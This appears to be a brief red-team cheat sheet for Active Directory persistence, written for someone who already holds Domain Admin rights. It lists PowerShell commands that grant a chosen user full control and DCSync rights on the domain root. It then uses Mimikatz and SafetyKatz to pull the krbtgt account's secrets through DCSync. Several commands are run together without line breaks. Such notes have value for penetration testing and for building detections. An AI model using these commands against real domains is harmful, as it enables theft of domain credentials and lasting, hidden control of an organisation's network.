This is a persistence mechanism, so it is assumed you have gained high privileges such as Domain Admin.
Add FullControl rights
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=name' -PrincipalIdentity username -Rights All -PrincipalDomain domain.name -TargetDomain domain.name -VerboseSet-ADACL -SamAccountName username -DistinguishedName 'DC=domain,DC=name' -Right GenericAll -VerboseAdd rights for DCSync
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=name' -PrincipalIdentity username -Rights DCSync -PrincipalDomain domain.name -TargetDomain domain.name -VerboseSet-ADACL -SamAccountName username -DistinguishedName 'DC=domain,DC=name' -GUIDRight DCsync -VerboseExecute DCSync
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'C:\AD\Tools\SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"